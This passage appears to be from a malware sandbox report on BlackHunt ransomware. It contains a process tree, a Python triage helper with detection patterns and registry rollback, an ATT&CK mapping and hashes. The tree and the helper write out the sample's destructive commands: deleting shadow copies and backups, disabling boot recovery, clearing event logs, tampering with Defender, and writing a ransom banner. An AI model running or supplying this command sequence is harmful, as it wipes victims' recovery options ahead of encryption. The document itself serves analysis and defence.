      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      PID: 2860
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        PID: 2076

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      PID: 2544
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
        PID: 1812

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      PID: 2636
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
        PID: 2152

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      PID: 2916
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
        PID: 2336

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
      PID: 1628
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
        PID: 1948

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
      PID: 1376
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
        PID: 2256

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
      PID: 768
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
        PID: 876

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
      PID: 1880
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
        PID: 828

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      PID: 2740
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
        PID: 2920
      [4] C:\Windows\system32\reg.exe
          cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
          PID: 1332
          (shown at depth 4 under reg.exe in the trace; reg.exe does not spawn children, so this parent attribution is an artefact of PID reuse)

  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
      PID: 588
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
        PID: 2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe" /F2⤵PID:560
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe" /F3⤵
- Creates scheduled task(s)
PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2952
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2304
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2356
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:844
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2656
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2380
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2384
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:484
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1952
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1668
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2872
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2440
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2352
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2408
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3200
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2104
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:604
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3036
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1940
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2936
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3016
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"2⤵PID:1556
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3316
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1944
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2040
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2404
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2276
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1544
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2068
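The process tree above is a long list of cmd.exe children doing a handful of distinct things: purging shadow copies and the backup catalog, disabling boot recovery and System Restore, deleting the USN journal, clearing event logs, setting Defender and Explorer policies, creating (and later deleting) a SYSTEM scheduled task, writing a ransom logon banner, and deleting itself. The following Python helper is an added triage example, written for this page and not part of the sandbox report: it classifies each command line into those behaviours, maps them to ATT&CK technique IDs (the IDs are the editor's mapping; the report itself lists tactic and technique names only), and derives the reg.exe rollback command for every policy value the sample set through reg.exe. The REPORT_CMDLINES list is copied from the tree above, one representative line per behaviour.

```python
"""Triage helper for the process tree above. Added example by the editor; not part
of the sandbox report. ATT&CK ids are the editor's mapping of each behaviour."""
import re
from collections import Counter

# (label, ATT&CK technique id, pattern matched against the lowercased command line)
RULES = [
    ("shadow_copy_deletion",         "T1490",     r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("shadow_storage_resize",        "T1490",     r"vssadmin(\.exe)?\s+resize\s+shadowstorage"),
    ("backup_catalog_deletion",      "T1490",     r"wbadmin(\.exe)?\s+delete\s+catalog"),
    ("boot_recovery_disabled",       "T1490",     r"bcdedit\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("system_restore_task_disabled", "T1490",     r'schtasks(\.exe)?\s+/change\s+/tn\s+"\\microsoft\\windows\\systemrestore\\sr"\s+/disable'),
    ("recovery_policy_set",          "T1490",     r'reg\s+add\s+"hkey_local_machine\\software\\policies\\microsoft\\windows( nt\\systemrestore|\\backup\\client|\\winre)'),
    ("usn_journal_deletion",         "T1070",     r"fsutil(\.exe)?\s+usn\s+deletejournal"),
    ("event_log_cleared",            "T1070.001", r"wevtutil(\.exe)?\s+cl\s+"),
    ("self_deletion",                "T1070.004", r"ping\s+127\.0\.0\.1.*&\s*del\s+"),
    ("defender_policy_tamper",       "T1562.001", r'reg\s+add\s+"hkey_local_machine\\software\\policies\\microsoft\\windows defender'),
    ("user_lockout_policy",          "T1112",     r'reg\s+add\s+"hkey_current_user\\software\\microsoft\\windows\\currentversion\\policies'),
    ("ransom_logon_banner",          "T1491.001", r'reg\s+add\s+.*\\policies\\system"\s+/v\s+"legalnotice(caption|text)"'),
    ("scheduled_task_persistence",   "T1053.005", r"schtasks(\.exe)?\s+/create\s+"),
]
RULES = [(label, tid, re.compile(rx)) for label, tid, rx in RULES]


def classify(cmdline):
    """Behaviour labels matching one process command line (empty list if benign)."""
    low = cmdline.lower()
    labels = []
    for label, _tid, rx in RULES:
        if rx.search(low):
            # The sample resets DisableTaskMgr/NoRun to 0 near the end: its own undo, not a new lock-out.
            if label == "user_lockout_policy" and re.search(r"/d\s+0\b", low):
                label = "user_lockout_policy_reverted"
            labels.append(label)
    return labels


def summarize(cmdlines):
    """Count of command lines per behaviour label."""
    return Counter(label for c in cmdlines for label in classify(c))


def techniques(cmdlines):
    """Sorted ATT&CK technique ids covered by the observed command lines."""
    low = [c.lower() for c in cmdlines]
    return sorted({tid for _label, tid, rx in RULES if any(rx.search(c) for c in low)})


REG_ADD_RX = re.compile(r'reg\s+add\s+"([^"]+)"\s+(?:/ve|/v\s+"([^"]+)")', re.I)


def registry_rollback(cmdlines):
    """'reg delete' counterpart of every 'reg add' in the command lines, deduplicated in order.
    Covers only values set through reg.exe; direct registry API writes are not in these lines."""
    cmds = []
    for c in cmdlines:
        m = REG_ADD_RX.search(c)
        if m:
            key, value = m.group(1), m.group(2)
            cmds.append(f'reg delete "{key}" /ve /f' if value is None else f'reg delete "{key}" /v "{value}" /f')
    return list(dict.fromkeys(cmds))


WEVTUTIL_RX = re.compile(r"wevtutil(?:\.exe)?\s+cl\s+(\S+)", re.I)


def cleared_event_logs(cmdlines):
    """Names of the event logs cleared with 'wevtutil cl', deduplicated in order."""
    logs = []
    for c in cmdlines:
        m = WEVTUTIL_RX.search(c)
        if m:
            logs.append(m.group(1))
    return list(dict.fromkeys(logs))


SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe"
# Command lines copied from the process tree above, one representative per behaviour.
REPORT_CMDLINES = [
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f',
    r'SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "' + SAMPLE_EXE + '" /F',
    r"vssadmin.exe Delete Shadows /all /quiet",
    r"vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB",
    r"bcdedit /set {default} recoveryenabled No",
    r"wbadmin.exe delete catalog -quiet",
    r"fsutil.exe usn deletejournal /D C:",
    r"wevtutil.exe cl Security /e:false",
    r'REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f',
    r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "' + SAMPLE_EXE + '"',
    r'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable',
]

if __name__ == "__main__":
    for label, n in sorted(summarize(REPORT_CMDLINES).items()):
        print(f"{n:2d}  {label}")
    print("ATT&CK:", ", ".join(techniques(REPORT_CMDLINES)))
    print("cleared logs:", ", ".join(cleared_event_logs(REPORT_CMDLINES)))
    print("\n".join(registry_rollback(REPORT_CMDLINES)))
```

Feed it the full tree (or Sysmon/4688 command lines from a real host) rather than the fourteen representatives to get the real counts. Two caveats on the rollback output: the HKLM\Software\Policies values it deletes are normally absent on an unmanaged host, so deletion restores defaults, but on a domain-joined machine compare against the GPO baseline first; and nothing here restores what vssadmin, wbadmin, bcdedit, fsutil and wevtutil destroyed, which is the point of running these commands before encryption.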
MITRE ATT&CK Enterprise v15 (the number in parentheses is the count of report signatures mapped to each technique)

Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (2)
- Indicator Removal (4): File Deletion (3)
- Modify Registry (5)
Downloads

- Filesize: 1KB
  MD5: 4b17f2a66300768b19d6fb28666232ae
  SHA1: 3d40155141bb713115f69a9057ed5e20317e0ac2
  SHA256: caf8d04a386c30c70bfb1842b44a02b977fa70e9352a5cf376c13e13eef1aa8f
  SHA512: 29db3f24fb4444bc11534817ac71986327170b1183229bd6b0a78d0d4222bba7175c977a338b90f0af2a25807737ebe5e8b9408417e2a557e60b11100b3159f4

- Filesize: 12KB
  MD5: ce523654763a04a5a64f4d6cf3518de9
  SHA1: 998c2de6c6469a5808380acaa4ee9517ea46e26f
  SHA256: dc79d52851f264e10a5b23c2985bc11e2a6323625aa1395ca09ffb82032459b9
